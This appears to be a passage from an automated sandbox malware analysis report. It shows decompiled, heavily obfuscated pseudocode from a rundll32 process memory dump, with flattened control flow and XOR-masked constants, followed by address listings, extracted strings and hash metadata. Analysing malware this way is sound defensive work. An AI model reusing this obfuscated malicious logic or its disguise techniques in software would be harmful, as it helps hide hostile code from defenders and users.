				signed int _t427;
				signed int _t428;
				signed int _t429;
				signed int _t430;
				signed int _t431;
				signed int _t432;
				signed int _t433;
				intOrPtr _t434;
				void* _t473;
				intOrPtr* _t482;
				signed int _t485;
				signed int* _t491;
				void* _t493;

				_push(_a16);
				_push(_a12);
				_v16 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E007B20B9(__edx);
				_v72 = 0xfd05e7;
				_t491 =  &(( &_v192)[6]);
				_v72 = _v72 | 0xfdc7c414;
				_v72 = _v72 ^ 0xfdffc5f6;
				_t489 = 0;
				_v128 = 0x159cf;
				_t421 = 0;
				_v128 = _v128 + 0x2543;
				_t485 = 0x8939926;
				_v128 = _v128 ^ 0xc1c453fb;
				_v128 = _v128 ^ 0xc1c52ce8;
				_v188 = 0xc0a375;
				_t423 = 0x5a;
				_v188 = _v188 / _t423;
				_v188 = _v188 + 0xf5e3;
				_v188 = _v188 + 0xffffba7d;
				_v188 = _v188 ^ 0x0002d452;
				_v192 = 0xeb0e91;
				_v192 = _v192 << 0xb;
				_v192 = _v192 >> 0xd;
				_v192 = _v192 | 0x4be38997;
				_v192 = _v192 ^ 0x4be25280;
				_v52 = 0x3397e5;
				_v52 = _v52 ^ 0x345a01ed;
				_v52 = _v52 ^ 0x346a35aa;
				_v60 = 0x140ff9;
				_t424 = 6;
				_v60 = _v60 / _t424;
				_v60 = _v60 ^ 0x000ad59a;
				_v168 = 0x6059cb;
				_t425 = 0x1a;
				_v168 = _v168 * 0x7f;
				_v168 = _v168 / _t425;
				_v168 = _v168 * 0x21;
				_v168 = _v168 ^ 0x3ca5e455;
				_v112 = 0x1e6ccd;
				_v112 = _v112 << 0xc;
				_v112 = _v112 + 0xffff3925;
				_v112 = _v112 ^ 0xe6c2746b;
				_v44 = 0xb8d15a;
				_v44 = _v44 >> 0xb;
				_v44 = _v44 ^ 0x0008fc1e;
				_v172 = 0x2478d;
				_v172 = _v172 ^ 0x68bbc6f8;
				_v172 = _v172 >> 0xc;
				_v172 = _v172 | 0x6f66efc5;
				_v172 = _v172 ^ 0x6f64ef75;
				_v116 = 0x51a99f;
				_v116 = _v116 | 0x1f129b6c;
				_v116 = _v116 ^ 0xc118cdce;
				_v116 = _v116 ^ 0xde47442a;
				_v132 = 0x216e1a;
				_v132 = _v132 + 0xffff43fb;
				_v132 = _v132 ^ 0x7008f7db;
				_v132 = _v132 ^ 0x702542ff;
				_v84 = 0xc91edc;
				_t426 = 0x5e;
				_v84 = _v84 / _t426;
				_v84 = _v84 ^ 0x0006a22a;
				_v164 = 0xa7de11;
				_v164 = _v164 + 0xffff6841;
				_v164 = _v164 >> 4;
				_v164 = _v164 << 3;
				_v164 = _v164 ^ 0x005f8816;
				_v108 = 0xdd6066;
				_v108 = _v108 >> 8;
				_v108 = _v108 << 8;
				_v108 = _v108 ^ 0x00d87344;
				_v92 = 0x21cc88;
				_v92 = _v92 ^ 0xd81b96af;
				_v92 = _v92 ^ 0xd8329727;
				_v96 = 0xbd6d4e;
				_t427 = 0x26;
				_v96 = _v96 / _t427;
				_v96 = _v96 ^ 0x00061825;
				_v24 = 0x6502ac;
				_v24 = _v24 << 4;
				_v24 = _v24 ^ 0x065de4e3;
				_v56 = 0x642336;
				_v56 = _v56 + 0xffffd3db;
				_v56 = _v56 ^ 0x006ffb84;
				_v68 = 0x348f1;
				_t428 = 0x55;
				_v68 = _v68 / _t428;
				_v68 = _v68 ^ 0x0008f449;
				_v76 = 0x3c74f1;
				_v76 = _v76 + 0xffff407e;
				_v76 = _v76 ^ 0x003b6445;
				_v88 = 0xc452b0;
				_v88 = _v88 + 0xffff3a6d;
				_v88 = _v88 ^ 0x00c8dd7a;
				_v48 = 0xc68c2;
				_t429 = 0x57;
				_v48 = _v48 / _t429;
				_v48 = _v48 ^ 0x0008f98a;
				_v100 = 0x631361;
				_v100 = _v100 | 0x5af5ab8e;
				_v100 = _v100 ^ 0x5affcbc5;
				_v148 = 0x1761a;
				_v148 = _v148 ^ 0xebf93349;
				_v148 = _v148 >> 4;
				_v148 = _v148 ^ 0x0eb625e6;
				_v40 = 0xe5378a;
				_v40 = _v40 >> 2;
				_v40 = _v40 ^ 0x003c8b43;
				_v140 = 0x73545;
				_t430 = 0x61;
				_v140 = _v140 * 0x21;
				_v140 = _v140 / _t430;
				_v140 = _v140 ^ 0x0002b6d6;
				_v80 = 0x39d04;
				_v80 = _v80 >> 4;
				_v80 = _v80 ^ 0x00009cd0;
				_v156 = 0x1ba0aa;
				_v156 = _v156 + 0x716e;
				_v156 = _v156 << 0xd;
				_v156 = _v156 ^ 0xb6bcbcaf;
				_v156 = _v156 ^ 0x34f57f5f;
				_v20 = 0xda4179;
				_t431 = 0x27;
				_t482 = _v16;
				_v20 = _v20 / _t431;
				_v20 = _v20 ^ 0x00092493;
				_v32 = 0x6dc25;
				_v32 = _v32 >> 0xf;
				_v32 = _v32 ^ 0x0008149e;
				_v180 = 0x3ec4dc;
				_v180 = _v180 >> 5;
				_t432 = 0x70;
				_v180 = _v180 / _t432;
				_v180 = _v180 + 0xffff18e8;
				_v180 = _v180 ^ 0xfff4c632;
				_v64 = 0xea19a3;
				_v64 = _v64 | 0xee52e837;
				_v64 = _v64 ^ 0xeef909eb;
				_v28 = 0xcaf9fa;
				_v28 = _v28 >> 0xe;
				_v28 = _v28 ^ 0x000e6f4e;
				_v120 = 0x563e36;
				_v120 = _v120 >> 0xe;
				_v120 = _v120 << 5;
				_v120 = _v120 ^ 0x00027d23;
				_v176 = 0x87c40f;
				_v176 = _v176 ^ 0xb401f56c;
				_v176 = _v176 + 0xffff7429;
				_v176 = _v176 | 0xf3ec0d69;
				_v176 = _v176 ^ 0xf7eb47c6;
				_v184 = 0x47488d;
				_v184 = _v184 >> 0xf;
				_v184 = _v184 << 0xf;
				_v184 = _v184 << 1;
				_v184 = _v184 ^ 0x0086c0ad;
				_v136 = 0xb24629;
				_v136 = _v136 | 0x7ef33f67;
				_v136 = _v136 ^ 0x7ef17c1c;
				_v144 = 0xba01aa;
				_v144 = _v144 | 0x3cf3a1ff;
				_v144 = _v144 ^ 0x3cf83085;
				_v124 = 0xbe6d5e;
				_v124 = _v124 + 0xffff96e9;
				_v124 = _v124 | 0xcf3d3218;
				_v124 = _v124 ^ 0xcfb1306a;
				_v36 = 0xa69a94;
				_v36 = _v36 + 0xffffed5e;
				_v36 = _v36 ^ 0x00a0b8ce;
				_v104 = 0xa8033b;
				_t433 = 9;
				_v104 = _v104 / _t433;
				_v104 = _v104 >> 6;
				_v104 = _v104 ^ 0x0005e2c3;
				while(1) {
					L1:
					_t434 = _v160;
					while(1) {
						_t400 = _v152;
						while(1) {
							L3:
							_t493 = _t485 - 0xa1723c1;
							if(_t493 > 0) {
								goto L19;
							}
							L4:
							if(_t493 == 0) {
								E007B8519(_v144, _v124, _t489);
								_t485 = 0x4b7559b;
								goto L17;
							} else {
								if(_t485 == 0x4b7559b) {
									return E007B8519(_v36, _v104, _t421);
								}
								if(_t485 == 0x4ed616e) {
									_t441 = _v172;
									_t407 = E007B16AF(_v172,  &_v12, _v116, _v132, _t434, _a8, _t421, _v84, _t434,  &_v4, _t434, _v164, _v108, _v92, _v96, _t434, _t434, _v24, _t434, _v56);
									_t491 =  &(_t491[0x12]);
									if(_t407 == 0) {
										L16:
										_t485 = 0xa1723c1;
										L17:
										_t400 = _v152;
									} else {
										_t410 = E007BD25E(_t441);
										_t485 = 0x9a40434;
										_t400 = _v12 * 0x2c + _t421;
										_v152 = _t400;
										_t482 =  >=  ? _t421 : (_t410 & 0x0000001f) * 0x2c + _t421;
									}
									_t434 = _v160;
									_t473 = 0x6a50b97;
									continue;
								} else {
									if(_t485 == _t473) {
										E007B2007(_v72, _v40, _v140, _t434, _v80,  &_v8, _v156, _t434, _t489, _v20);
										_t485 =  !=  ? 0xd1a593f : 0xb29ddc7;
										_t400 = E007B8F9E(_v32, _v180, _v64, _v28, _v160);
										_t491 =  &(_t491[0xb]);
										L30:
										_t473 = 0x6a50b97;
										goto L31;
									} else {
										if(_t485 == 0x8939926) {
											_t485 = 0xe60f9b1;
											continue;
										} else {
											if(_t485 != 0x9a40434) {
												L31:
												if(_t485 != 0x88fb243) {
													goto L1;
												}
											} else {
												_t434 = E007A42C4(_v88, _a8, _v48, _v188,  *_t482, _v100, _v148);
												_t491 =  &(_t491[5]);
												_v160 = _t434;
												_t473 = 0x6a50b97;
												_t485 =  !=  ? 0x6a50b97 : 0xb29ddc7;
												_t400 = _v152;
												while(1) {
													L3:
													_t493 = _t485 - 0xa1723c1;
													if(_t493 > 0) {
														goto L19;
													}
													goto L4;
												}
												goto L19;
											}
										}
									}
								}
							}
							L34:
							return _t400;
							L19:
							if(_t485 == 0xaf524c8) {
								_push(_t434);
								_push(_t434);
								_t400 = E007A7FF2(0x2000);
								_t489 = _t400;
								if(_t400 == 0) {
									_t485 = 0x4b7559b;
									goto L30;
								} else {
									_t485 = 0x4ed616e;
									goto L17;
								}
							} else {
								if(_t485 == 0xb29ddc7) {
									_t482 = _t482 + 0x2c;
									asm("sbb esi, esi");
									_t485 = (_t485 & 0xff8ce073) + 0xa1723c1;
									continue;
								} else {
									_t400 = 0xd1a593f;
									if(_t485 == 0xd1a593f) {
										E007ADF6F(_v120, _v176, _v128, _v16, _v184, _v136, _t489);
										_t491 =  &(_t491[5]);
										goto L16;
									} else {
										if(_t485 != 0xe60f9b1) {
											goto L31;
										} else {
											_push(_t434);
											_push(_t434);
											_t400 = E007A7FF2(0x20000);
											_t421 = 0xd1a593f;
											if(0xd1a593f != 0) {
												_t485 = 0xaf524c8;
												goto L17;
											}
										}
									}
								}
							}
							goto L34;
						}
					}
				}
			}

0x007ad6e2
0x007ad6eb
0x007ad6f2
0x007ad6f9
0x007ad700
0x007ad707
0x007ad709
0x007ad70e
0x007ad719
0x007ad71c
0x007ad729
0x007ad734
0x007ad736
0x007ad73e
0x007ad740
0x007ad748
0x007ad74d
0x007ad755
0x007ad75d
0x007ad76b
0x007ad770
0x007ad776
0x007ad77e
0x007ad786
0x007ad78e
0x007ad796
0x007ad79b
0x007ad7a0
0x007ad7a8
0x007ad7b0
0x007ad7bb
0x007ad7c6
0x007ad7d1
0x007ad7e3
0x007ad7e8
0x007ad7f1
0x007ad7fc
0x007ad809
0x007ad80a
0x007ad814
0x007ad81d
0x007ad821
0x007ad829
0x007ad831
0x007ad836
0x007ad83e
0x007ad846
0x007ad851
0x007ad859
0x007ad864
0x007ad86c
0x007ad874
0x007ad879
0x007ad881
0x007ad889
0x007ad891
0x007ad899
0x007ad8a1
0x007ad8a9
0x007ad8b1
0x007ad8b9
0x007ad8c1
0x007ad8cb
0x007ad8d9
0x007ad8de
0x007ad8e7
0x007ad8f2
0x007ad8fa
0x007ad902
0x007ad907
0x007ad90c
0x007ad914
0x007ad91c
0x007ad921
0x007ad926
0x007ad92e
0x007ad936
0x007ad93e
0x007ad946
0x007ad952
0x007ad957
0x007ad95d
0x007ad965
0x007ad970
0x007ad978
0x007ad983
0x007ad98e
0x007ad999
0x007ad9a4
0x007ad9b6
0x007ad9bb
0x007ad9c4
0x007ad9cf
0x007ad9da
0x007ad9e5
0x007ad9f0
0x007ad9f8
0x007ada00
0x007ada08
0x007ada1a
0x007ada1f
0x007ada28
0x007ada33
0x007ada3b
0x007ada43
0x007ada4b
0x007ada53
0x007ada5b
0x007ada60
0x007ada68
0x007ada73
0x007ada7b
0x007ada86
0x007ada93
0x007ada94
0x007ada9e
0x007adaa2
0x007adaaa
0x007adab5
0x007adabd
0x007adac8
0x007adad0
0x007adada
0x007adadf
0x007adae7
0x007adaef
0x007adb03
0x007adb08
0x007adb0f
0x007adb16
0x007adb21
0x007adb2c
0x007adb34
0x007adb3f
0x007adb47
0x007adb52
0x007adb57
0x007adb5b
0x007adb63
0x007adb6b
0x007adb76
0x007adb81
0x007adb8c
0x007adb97
0x007adb9f
0x007adbaa
0x007adbb2
0x007adbb7
0x007adbbc
0x007adbc4
0x007adbcc
0x007adbd4
0x007adbdc
0x007adbe4
0x007adbec
0x007adbf4
0x007adbf9
0x007adbfe
0x007adc02
0x007adc0a
0x007adc12
0x007adc1a
0x007adc22
0x007adc2a
0x007adc32
0x007adc3a
0x007adc42
0x007adc4a
0x007adc52
0x007adc5a
0x007adc65
0x007adc70
0x007adc7b
0x007adc89
0x007adc91
0x007adc95
0x007adc9a
0x007adca2
0x007adca2
0x007adca2
0x007adca6
0x007adca6
0x007adcaa
0x007adcaa
0x007adcaa
0x007adcb0
0x00000000
0x00000000
0x007adcb6
0x007adcb6
0x007ade66
0x007ade6c
0x00000000
0x007adcbc
0x007adcc2
0x00000000
0x007adf63
0x007adcce
0x007ade01
0x007ade05
0x007ade0a
0x007ade0f
0x007ade52
0x007ade52
0x007ade57
0x007ade57
0x007ade11
0x007ade1f
0x007ade27
0x007ade39
0x007ade3d
0x007ade41
0x007ade41
0x007ade44
0x007ade48
0x00000000
0x007adcd4
0x007adcd6
0x007add6a
0x007add91
0x007add9b
0x007adda0
0x007adf40
0x007adf40
0x00000000
0x007adcd8
0x007adcde
0x007add31
0x00000000
0x007adce0
0x007adce6
0x007adf45
0x007adf4b
0x00000000
0x007adf4d
0x007adcec
0x007add14
0x007add16
0x007add1b
0x007add24
0x007add29
0x007adca6
0x007adcaa
0x007adcaa
0x007adcaa
0x007adcb0
0x00000000
0x00000000
0x00000000
0x007adcb0
0x00000000
0x007adcaa
0x007adce6
0x007adcde
0x007adcd6
0x007adcce
0x007adf6e
0x007adf6e
0x007ade73
0x007ade79
0x007adf22
0x007adf23
0x007adf24
0x007adf29
0x007adf2f
0x007adf3b
0x00000000
0x007adf31
0x007adf31
0x00000000
0x007adf31
0x007ade7f
0x007ade85
0x007adef6
0x007adefb
0x007adf03
0x00000000
0x007ade87
0x007ade87
0x007ade8e
0x007adee9
0x007adeee
0x00000000
0x007ade90
0x007ade96
0x00000000
0x007ade9c
0x007adeb3
0x007adeb4
0x007adeb5
0x007adeba
0x007adec0
0x007adec6
0x00000000
0x007adec6
0x007adec0
0x007ade96
0x007ade8e
0x007ade85
0x00000000
0x007ade79
0x007adcaa
0x007adca6

Strings

6>V, xrefs: 007ADBAA
6#d, xrefs: 007AD983
nq, xrefs: 007ADAD0
C%, xrefs: 007AD740
udo, xrefs: 007AD881
7R, xrefs: 007ADB76
Ed;, xrefs: 007AD9E5

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 6#d$6>V$7R$C%$Ed;$nq$udo
API String ID: 0-652707834
Opcode ID: f1ebdc49b849bf8c904815538ebaa2ee5cbb6585970c67cf9760e8e328c8f8b3
Instruction ID: 0abe2beb9cadee1772a2ffe750104c766a812f4f3b9c051f1e384dd74f9f3927
Opcode Fuzzy Hash: f1ebdc49b849bf8c904815538ebaa2ee5cbb6585970c67cf9760e8e328c8f8b3
Instruction Fuzzy Hash: 9012327250C3809FD378DF25C48AA9BBBE2BBC5704F108A1DE5DA86260D7B58949CF53

Uniqueness

Uniqueness Score: -1.00%

Function 007A81B7 Relevance: 9.1, Strings: 7, Instructions: 349
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E007A81B7() {
				void* _t347;
				signed int _t350;
				signed int _t351;
				signed int _t353;
				signed int _t355;
				signed int _t360;
				signed int _t364;
				void* _t374;
				intOrPtr _t407;
				signed int _t411;
				signed int _t414;
				signed int _t415;
				signed int _t416;
				signed int _t417;
				signed int _t418;
				signed int _t419;
				signed int _t420;
				signed int* _t422;
				void* _t426;

				 *(_t426 + 0x74) = 0xd212a7;
				 *(_t426 + 0x74) =  *(_t426 + 0x74) ^ 0x52eac678;
				_t374 = 0xebf23c2;
				 *(_t426 + 0x74) =  *(_t426 + 0x74) ^ 0x5238d4de;
				 *(_t426 + 0x20) = 0x60274e;
				 *(_t426 + 0x20) =  *(_t426 + 0x20) >> 4;
				_t414 = 0x29;
				 *(_t426 + 0x34) =  *(_t426 + 0x20) / _t414;
				 *(_t426 + 0x34) =  *(_t426 + 0x34) + 0x7a4c;
				 *(_t426 + 0x34) =  *(_t426 + 0x34) ^ 0x00009fd0;
				 *(_t426 + 0x9c) = 0x5f71eb;
				 *(_t426 + 0x9c) =  *(_t426 + 0x9c) ^ 0x01156387;
				 *(_t426 + 0x9c) =  *(_t426 + 0x9c) ^ 0x014a126f;
				 *(_t426 + 0x1c) = 0x8735e4;
				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) >> 0xe;
				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) << 3;
				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) >> 4;
				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) ^ 0x000153b5;
				 *(_t426 + 0x58) = 0x9ed5c5;
				_t415 = 0x17;
				 *(_t426 + 0xa0) =  *(_t426 + 0xa0) & 0x00000000;
				 *(_t426 + 0x54) =  *(_t426 + 0x58) * 0x5d;
				 *(_t426 + 0x54) =  *(_t426 + 0x54) ^ 0xb1e1bce9;
				 *(_t426 + 0x54) =  *(_t426 + 0x54) ^ 0x88583d56;
				 *(_t426 + 0x5c) = 0x8fe0dc;
				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) + 0xffff3edc;
				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) / _t415;
				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) ^ 0x00095c01;
				 *(_t426 + 0x48) = 0x18253c;
				 *(_t426 + 0x48) =  *(_t426 + 0x48) + 0xf9f1;
				 *(_t426 + 0x48) =  *(_t426 + 0x48) << 7;
				 *(_t426 + 0x48) =  *(_t426 + 0x48) ^ 0x0c842cab;
				 *(_t426 + 0x94) = 0x40d4a3;
				 *(_t426 + 0x94) =  *(_t426 + 0x94) << 5;
				 *(_t426 + 0x94) =  *(_t426 + 0x94) ^ 0x081e10bd;
				 *(_t426 + 0x20) = 0x8fc5ff;
				 *(_t426 + 0x20) =  *(_t426 + 0x20) >> 4;
				 *(_t426 + 0x20) =  *(_t426 + 0x20) ^ 0x245daa70;
				 *(_t426 + 0x20) =  *(_t426 + 0x20) ^ 0xfc587561;
				 *(_t426 + 0x20) =  *(_t426 + 0x20) ^ 0xd80c07a2;
				 *(_t426 + 0x38) = 0x52431;
				 *(_t426 + 0x38) =  *(_t426 + 0x38) * 0x31;
				 *(_t426 + 0x38) =  *(_t426 + 0x38) ^ 0xfa9954a0;
				 *(_t426 + 0x38) =  *(_t426 + 0x38) + 0xffff6dd1;
				 *(_t426 + 0x38) =  *(_t426 + 0x38) ^ 0xfa6f2662;
				 *(_t426 + 0x44) = 0xc4652;
				 *(_t426 + 0x44) =  *(_t426 + 0x44) + 0xffff61fe;
				 *(_t426 + 0x44) =  *(_t426 + 0x44) >> 4;
				 *(_t426 + 0x44) =  *(_t426 + 0x44) ^ 0x0000c191;
				 *(_t426 + 0x10) = 0x2c06e;
				 *(_t426 + 0x10) =  *(_t426 + 0x10) + 0xffffb3fc;
				 *(_t426 + 0x10) =  *(_t426 + 0x10) * 0x27;
				 *(_t426 + 0x10) =  *(_t426 + 0x10) + 0xbfb5;
				 *(_t426 + 0x10) =  *(_t426 + 0x10) ^ 0x00679be9;
				 *(_t426 + 0x7c) = 0xc3ec9d;
				 *(_t426 + 0x7c) =  *(_t426 + 0x7c) << 7;
				 *(_t426 + 0x7c) =  *(_t426 + 0x7c) ^ 0x61f5edc1;
				 *(_t426 + 0x70) = 0x3416d6;
				 *(_t426 + 0x70) =  *(_t426 + 0x70) << 3;
				 *(_t426 + 0x70) =  *(_t426 + 0x70) ^ 0x01aaf790;
				 *(_t426 + 0x64) = 0x1e8df6;
				 *(_t426 + 0x64) =  *(_t426 + 0x64) | 0x232ea122;
				 *(_t426 + 0x64) =  *(_t426 + 0x64) * 0x6c;
				 *(_t426 + 0x64) =  *(_t426 + 0x64) ^ 0xde707d95;
				 *(_t426 + 0x28) = 0xebc79e;
				 *(_t426 + 0x28) =  *(_t426 + 0x28) | 0xfe2cd41a;
				 *(_t426 + 0x28) =  *(_t426 + 0x28) + 0xffff955f;
				 *(_t426 + 0x28) =  *(_t426 + 0x28) + 0xf79a;
				 *(_t426 + 0x28) =  *(_t426 + 0x28) ^ 0xfef90bb7;
				 *(_t426 + 0x4c) = 0x6795aa;
				 *(_t426 + 0x4c) =  *(_t426 + 0x4c) >> 5;
				 *(_t426 + 0x4c) =  *(_t426 + 0x4c) + 0xffffddd4;
				 *(_t426 + 0x4c) =  *(_t426 + 0x4c) ^ 0x0005ee09;
				 *(_t426 + 0x50) = 0xbc4be8;
				 *(_t426 + 0x50) =  *(_t426 + 0x50) ^ 0xc40dbfb1;
				_t416 = 0x6f;
				 *(_t426 + 0x54) =  *(_t426 + 0x50) * 0x3a;
				 *(_t426 + 0x54) =  *(_t426 + 0x54) ^ 0x9054da47;
				 *(_t426 + 0x94) = 0xde468f;
				 *(_t426 + 0x94) =  *(_t426 + 0x94) + 0xffff1011;
				 *(_t426 + 0x94) =  *(_t426 + 0x94) ^ 0x00dd868e;
				 *(_t426 + 0x18) = 0x6e4fa6;
				 *(_t426 + 0x18) =  *(_t426 + 0x18) >> 8;
				 *(_t426 + 0x18) =  *(_t426 + 0x18) ^ 0x937c1de8;
				 *(_t426 + 0x18) =  *(_t426 + 0x18) | 0x0d58262f;
				 *(_t426 + 0x18) =  *(_t426 + 0x18) ^ 0x9f7b4471;
				 *(_t426 + 0x5c) = 0xc77145;
				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) + 0x9c58;
				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) / _t416;
				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) ^ 0x0006cc79;
				 *(_t426 + 0x44) = 0x492c53;
				 *(_t426 + 0x44) =  *(_t426 + 0x44) | 0x932025a2;
				 *(_t426 + 0x44) =  *(_t426 + 0x44) << 0xb;
				 *(_t426 + 0x44) =  *(_t426 + 0x44) ^ 0x496991d6;
				 *(_t426 + 0xa0) = 0x27589;
				_t417 = 0x3e;
				 *(_t426 + 0xa0) =  *(_t426 + 0xa0) * 0x6d;
				 *(_t426 + 0xa0) =  *(_t426 + 0xa0) ^ 0x010c563c;
				 *(_t426 + 0x30) = 0xb4bbc8;
				 *(_t426 + 0x30) =  *(_t426 + 0x30) / _t417;
				 *(_t426 + 0x30) =  *(_t426 + 0x30) + 0xffff42d9;
				 *(_t426 + 0x30) =  *(_t426 + 0x30) + 0x5120;
				 *(_t426 + 0x30) =  *(_t426 + 0x30) ^ 0x000b6c85;
				 *(_t426 + 0x28) = 0xdf5b34;
				 *(_t426 + 0x28) =  *(_t426 + 0x28) ^ 0xb2734269;
				_t418 = 0x5e;
				 *(_t426 + 0x28) =  *(_t426 + 0x28) / _t418;
				 *(_t426 + 0x28) =  *(_t426 + 0x28) << 6;
				 *(_t426 + 0x28) =  *(_t426 + 0x28) ^ 0x79ab34c2;
				 *(_t426 + 0x90) = 0xff684d;
				 *(_t426 + 0x90) =  *(_t426 + 0x90) | 0x9d6c2ae6;
				 *(_t426 + 0x90) =  *(_t426 + 0x90) ^ 0x9df0e455;
				 *(_t426 + 0x20) = 0x90e304;
				_t419 = 0x7f;
				 *(_t426 + 0x1c) =  *(_t426 + 0x20) / _t419;
				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) << 6;
				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) << 0x10;
				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) ^ 0x0384731e;
				 *(_t426 + 0x60) = 0xa4eb1a;
				 *(_t426 + 0x60) =  *(_t426 + 0x60) << 0xc;
				 *(_t426 + 0x60) =  *(_t426 + 0x60) * 0x76;
				 *(_t426 + 0x60) =  *(_t426 + 0x60) ^ 0x45d23c3b;
				 *(_t426 + 0x34) = 0xdaab0d;
				 *(_t426 + 0x34) =  *(_t426 + 0x34) << 0xb;
				 *(_t426 + 0x34) =  *(_t426 + 0x34) + 0xdf07;
				 *(_t426 + 0x34) =  *(_t426 + 0x34) << 3;
				 *(_t426 + 0x34) =  *(_t426 + 0x34) ^ 0xaac3765a;
				 *(_t426 + 0x68) = 0xbbaf5f;
				 *(_t426 + 0x68) =  *(_t426 + 0x68) >> 3;
				_t372 =  *(_t426 + 0x6c);
				_t411 =  *(_t426 + 0x6c);
				_t424 =  *(_t426 + 0x6c);
				_t420 =  *(_t426 + 0x6c);
				 *(_t426 + 0x68) =  *(_t426 + 0x68) * 0x7d;
				 *(_t426 + 0x68) =  *(_t426 + 0x68) ^ 0x0b7165e1;
				 *(_t426 + 0x74) = 0xfd4b1c;
				 *(_t426 + 0x74) =  *(_t426 + 0x74) + 0x7fb7;
				 *(_t426 + 0x74) =  *(_t426 + 0x74) ^ 0x00f7158e;
				 *(_t426 + 0x88) = 0xbb9d8e;
				 *(_t426 + 0x88) =  *(_t426 + 0x88) * 0x48;
				 *(_t426 + 0x88) =  *(_t426 + 0x88) ^ 0x34cbdce1;
				 *(_t426 + 0x3c) = 0x9303e6;
				 *(_t426 + 0x3c) =  *(_t426 + 0x3c) << 0xf;
				 *(_t426 + 0x3c) =  *(_t426 + 0x3c) ^ 0xad47a309;
				 *(_t426 + 0x3c) =  *(_t426 + 0x3c) * 0x3d;
				 *(_t426 + 0x3c) =  *(_t426 + 0x3c) ^ 0xa7019983;
				 *(_t426 + 0x80) = 0xaf4918;
				 *(_t426 + 0x80) =  *(_t426 + 0x80) + 0x655a;
				 *(_t426 + 0x80) =  *(_t426 + 0x80) ^ 0x00a67f7b;
				 *(_t426 + 0x78) = 0xd8d1b1;
				 *(_t426 + 0x78) =  *(_t426 + 0x78) * 0x42;
				 *(_t426 + 0x78) =  *(_t426 + 0x78) ^ 0x37ebe9ce;
				while(1) {
					L1:
					_t347 = 0xfb52c5;
					L2:
					while(_t374 != 0xd963e9) {
						if(_t374 == _t347) {
							_t350 = E007BC264( *((intOrPtr*)(_t426 + 0xbc)), _t372,  *(_t426 + 0x3c), _t426 + 0xac,  *((intOrPtr*)(_t426 + 0xa4)), _t374, _t374, _t420,  *(_t426 + 0x68), _t374,  *(_t426 + 0x48),  *(_t426 + 0xa0), _t411);
							_t426 = _t426 + 0x2c;
							__eflags = _t350;
							if(_t350 == 0) {
								_t351 =  *(_t426 + 0xa0);
							} else {
								_t422 = _t411;
								while(1) {
									__eflags = _t422[1] - 4;
									if(_t422[1] != 4) {
										goto L20;
									}
									L19:
									_t355 = E007AB23C( *(_t426 + 0x38),  *(_t426 + 0x30), _t424,  *(_t426 + 0x94),  *(_t426 + 0x20),  &(_t422[3]));
									_t426 = _t426 + 0x10;
									__eflags = _t355;
									if(_t355 == 0) {
										_t351 = 1;
										 *(_t426 + 0xa0) = 1;
									} else {
										goto L20;
									}
									L25:
									_t420 =  *(_t426 + 0x6c);
									goto L26;
									L20:
									_t353 =  *_t422;
									__eflags = _t353;
									if(_t353 == 0) {
										_t351 =  *(_t426 + 0xa0);
									} else {
										_t422 = _t422 + _t353;
										__eflags = _t422[1] - 4;
										if(_t422[1] != 4) {
											goto L20;
										}
									}
									goto L25;
								}
							}
							L26:
							__eflags = _t351;
							if(__eflags == 0) {
								_t347 = 0xfb52c5;
								_t374 = 0xfb52c5;
								continue;
							} else {
								_t407 =  *0x7c3e0c; // 0x0
								E007B458F( *(_t426 + 0x64),  *((intOrPtr*)(_t407 + 8)),  *(_t426 + 0x34));
								_t374 = 0xd963e9;
								goto L1;
							}
							L32:
						} else {
							if(_t374 == 0x247652d) {
								_t360 = E007A8F65( *(_t426 + 0x68),  *(_t426 + 0x34), _t426 + 0xb4,  *(_t426 + 0x9c), 0x2000000, _t374, 1,  *(_t426 + 0x80),  *((intOrPtr*)(_t426 + 0xa4)),  *(_t426 + 0x6c), _t374,  *(_t426 + 0x30) | 0x00000006);
								_t372 = _t360;
								_t426 = _t426 + 0x28;
								__eflags = _t360 - 0xffffffff;
								if(__eflags != 0) {
									_t374 = 0x7db0050;
									while(1) {
										L1:
										_t347 = 0xfb52c5;
										goto L2;
									}
								}
							} else {
								if(_t374 == 0x4334ccc) {
									E007BDA22( *(_t426 + 0x28),  *(_t426 + 0x64), __eflags,  *(_t426 + 0x68), _t426 + 0xac, _t374,  *(_t426 + 0x48));
									_t364 = E007AB6CF(_t426 + 0xbc,  *((intOrPtr*)(_t426 + 0xac)),  *(_t426 + 0x34),  *(_t426 + 0x48));
									_t424 = _t364;
									_t426 = _t426 + 0x18;
									_t374 = 0x247652d;
									 *((short*)(_t364 - 2)) = 0;
									while(1) {
										L1:
										_t347 = 0xfb52c5;
										goto L2;
									}
								} else {
									if(_t374 == 0x7db0050) {
										_t420 = 0x1000;
										_push(_t374);
										_push(_t374);
										 *(_t426 + 0x74) = 0x1000;
										_t411 = E007A7FF2(0x1000);
										_t347 = 0xfb52c5;
										__eflags = _t411;
										_t374 =  !=  ? 0xfb52c5 : 0xf828486;
										continue;
									} else {
										if(_t374 == 0xebf23c2) {
											_t374 = 0x4334ccc;
											continue;
										} else {
											if(_t374 != 0xf828486) {
												L30:
												__eflags = _t374 - 0x24bb42a;
												if(__eflags != 0) {
													continue;
												} else {
												}
											} else {
												E007B1E67( *(_t426 + 0x94),  *(_t426 + 0x48),  *(_t426 + 0x88),  *(_t426 + 0x7c), _t372);
											}
										}
									}
								}
							}
						}
						return 0;
						goto L32;
					}
